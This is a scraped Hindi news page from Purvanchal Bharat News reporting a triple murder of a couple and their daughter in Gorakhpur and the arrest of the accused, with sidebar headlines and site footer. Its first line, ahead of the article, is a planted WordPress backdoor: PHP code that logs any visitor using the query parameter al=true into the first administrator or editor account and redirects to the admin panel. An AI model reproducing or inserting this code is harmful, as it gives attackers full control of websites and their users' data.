// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); मुख्यमंत्री के जिले में ट्रिपल मर्डर से सनसनी, हत्यारा हुआ गिरफ्तार - Purvanchal Bharat News
Connect with us

अपराध

मुख्यमंत्री के जिले में ट्रिपल मर्डर से सनसनी, हत्यारा हुआ गिरफ्तार

Published

on

पूर्वांचल भारत न्यूज़

यूपी के प्रयागराज के बाद गोरखपुर में ट्रिपल मर्डर से सनसनी फैल गई है. सोमवार की रात भाई की बेटी की शादी में पैदल चौराहा से गांव की ओर जा रहे पति-पत्‍नी और बेटी को सरेराह धारदार हथियार (बांकी) से गला रेतकर बेरहमी से मौत के घाट उतार दिया गया. तीनों पैदल ही गांव में भाई के घर मटकोड़वा के कार्यक्रम में शामिल होने के लिए जा रहे थे. पुलिस ने आरोपी को गिरफ्तार कर लिया है. उससे पूछताछ की जा रही है. शव को पोस्‍टमार्टम के लिए भेज दिया गया है. एक तरफा प्‍यार में घटना को अंजाम देने की आशंका जताई जा रही है. गांव में मातम पसरा है, तो वहीं एहतियात के तौर पर फोर्स भी तैनात कर दी गई है।

खोराबार थानाक्षेत्र के रायगंज निवासी गामा निषाद विदेश में रहते रहे हैं. दो महीने पहले घर आए. उन्होंने गांव से करीब एक किलोमीटर दूर बंग्ला चौराहे पर अपना मकान बनवाया है. वहीं पर पत्नी और बच्चों के साथ रहते रहे हैं. गामा के छोटे भाई रामा की बेटी की तीन दिन बाद 28 अप्रैल को शादी है. सोमवार की रात में मटकोड़वा का कार्यक्रम रहा है. गामा अपने नए मकान से अपनी पत्नी संजू निषाद (38), बेटी प्रीति निषाद (20) के साथ पैदल जा रहे थे. वे अभी घर से 800 मीटर की दूरी पर रहे हैं. इसी दौरान रास्‍ते में घात लगाकर बैठे हत्‍यारे ने धारदार हथियार से तीनों के गले पर बांकी से हमला कर दिया. घटनास्‍थल पर ही तीनों की मौत हो गई.मृतक का एक बेटा अच्‍छेलाल दूसरे रास्‍ते से गांव जाने की वजह से बच गया. मृतक का बड़ा बेटा सुग्रीव बाहर रहता है.

ट्रिपल मर्डर की सूचना के बाद गांव में कोहराम मच गया. हत्या की सूचना के बाद एडीजी अखिल कुमार, एसएसपी डा. विपिन ताडा, एसपी सिटी कृष्ण कुमार विश्नोई, सीओ कैन्ट श्यामदेव भारी फोर्स के साथ मौके पर पहुंच गए. क्राइम ब्रांच, डॉग स्‍क्‍वायड और फारेंसिक टीम ने भी मौके पर पहुंचकर पड़ताल की है. शव को वहां से हटाने के साथ ही गांव में भारी संख्या में फोर्स तैनात कर दी गई है.

पुलिस ने आरोपी आलोक पासवान पुत्र जवाहर पासवान को गिरफ्तार कर लिया है. पुलिस उससे पूछताछ कर रही है. आरोपी रायगंज गांव में ननिहाल में रहता रहा है. वो अकसर मृतका प्रीति को मोबाइल पर फोन भी करता रहा है. इसे लेकर युवती के पिता मृतक गामा निषाद ने उसे समझाया भी था. लेकिन एकतरफा प्‍यार में उसने वारदात को अंजाम दे दिया. पुलिस ने शव को पोस्‍टमार्टम के लिए भेज दिया गया है. गामा निषाद तीन भाइयों में सबसे बड़े रहे हैं. दूसरे नंबर के भाई रामा निषाद और तीसरे नंबर के सरविंद गांव के पुश्‍तैनी मकान पर ही रहते हैं.

मृतक के भाई रामा निषाद की पत्‍नी लीलावती ने बताया कि उनकी बेटी की 28 अप्रैल को शादी है. उन्‍होंने बताया कि आज मटकोड़वा की रस्‍म रही है. उन्‍होंने बताया कि उन्‍हें गांववालों ने बताया कि उनके जेठ गामा निषाद, जेठानी संजू निषाद और उनकी बेटी प्रीति की हत्‍या कर दी गई है. वे आरोपी के बारे में नहीं जानती हैं. उन्‍हें नहीं पता है कि आरोपी कहां का रहने वाला है. उन्‍होंने बताया कि वे लोग रस्‍म में व्‍यस्‍त रहे हैं. इसी बीच उन्‍हें सूचना मिली, तो उन्‍हें नहीं मालूम था कि उनके सगे जेठ और उनके परिवार की हत्‍या कर दी गई है. वे लोग डर के मारे घर छोड़कर बाहर नहीं गए.

Advertisement

गोरखपुर के एसएसपी डा. विपिन ताडा ने बताया कि खोराबार थानाक्षेत्र के रायगंज गांव में सरेराह पति-पत्‍नी और उनकी बेटी की धारदार हथियार से हत्‍या की सूचना मिली. घटनास्‍थल पर एडीजी, एसएसपी के साथ तमाम आलाधिकारी और फोर्स पहुंची है. धारदार हथियार से हत्‍या की गई है. पुलिस ने आरोपी आलोक पासवान को गिरफ्तार कर लिया है. उससे पूछताछ की जा रही है. इसमें सामने आया है कि आरोपी का मृतक युवती प्रीति के साथ प्रेम-प्रसंग का प्रयास किया गया था. प्रीति के मना करने पर उसने घटना को अंजाम दिया है. मौके पर फोरेंसिक और अन्‍य टीम आई है. साक्ष्‍य संकलन किया जा रहा है।

Share this with your friends:
Continue Reading
Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

टॉप न्यूज़

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

Plastic Banknotes news
ताज़ा ख़बर1 month ago

Plastic Banknotes: भारत में जल्द आ सकते हैं प्लास्टिक के नोट, RBI कर रहा तैयारी; जानिए क्या होंगे फायदे

lucknow women hanging
ताज़ा ख़बर1 month ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण2 months ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश2 months ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

पीपीगंज गैस न्यूज़
उत्तर प्रदेश2 months ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर शहर2 months ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण2 months ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

arjun news sikariganj
गोरखपुर ग्रामीण2 months ago

सिकरीगंज में पिकअप-बाइक की आमने-सामने भिड़ंत, युवक की मौत

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 months ago

दिल्ली समेत उत्तर-पश्चिम भारत में मौसम फिर बदलेगा, IMD का आंधी-बारिश और तेज हवाओं का अलर्ट

गोरखपुर शहर2 months ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

पीपीगंज गैस न्यूज़
उत्तर प्रदेश2 months ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश2 months ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

lucknow women hanging
ताज़ा ख़बर1 month ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

ताज़ा ख़बर2 months ago

शपथ लेते ही एक्शन में आए CM शुभेंदु अधिकारी, बंगाल के मुख्य सचिव और DGP से की अहम बैठक

Advertisement

Trending

free counter

हमारे बारे में-

पूर्वांचल भारत न्यूज एक रजिस्टर्ड न्यूज पोर्टल है ।
इसका उद्देश्य पूर्वांचल भारत के साथ ही देश दुनियां की खबरों व जानकारियों को हमारे दर्शकों को रोचक अंदाज में पहुंचना है। युवाओं को रोजगार सम्बन्धित जानकारी के साथ ही हर वर्ग की समस्या को हम उठा सकें यही हमारी प्राथमिकता होगी। इसके अलावा सांस्कृतिक, ऐतिहासिक और जनसमस्याओं से जुड़े समाचारों पर भी हमारा विशेष ध्यान होता है ।


प्रबन्धक / निदेशक:

जे. समरजीत जैसवार

प्रधान सम्पादक :

आदित्य धनराज

सम्पादक : अजय कुमार 

सलाहकार सम्पादक : जे०पी० 

सलाहकार सम्पादक : ब्रिजेन्द्र सिंह 

उपसम्पादक : एस.के. मिश्रा

उपसम्पादक : कमलेश यादव

उपसम्पादक : धीरेन्द्र कुमार

उपसम्पादक : नीतू यादव

सम्पादकीय :  मनीष कुमार

विज्ञापन और प्रसार प्रबन्धक: आदित्य धनराज

Our Visitor

041299
Total views : 48256


प्रधान कार्यालय :

कूड़ाघाट, निकट एम्स हॉस्पिटल मोहद्दीपुर, 

गोरखपुर, उo प्रo । पिन-273008

सम्पादकीय कार्यालय :

राम जानकी मार्ग, उरुवा बाजार, गोरखपुर
पिन-273407

Copyright © 2021. Powered by “PURVANCHAL BHARAT NEWS”

You cannot copy content of this page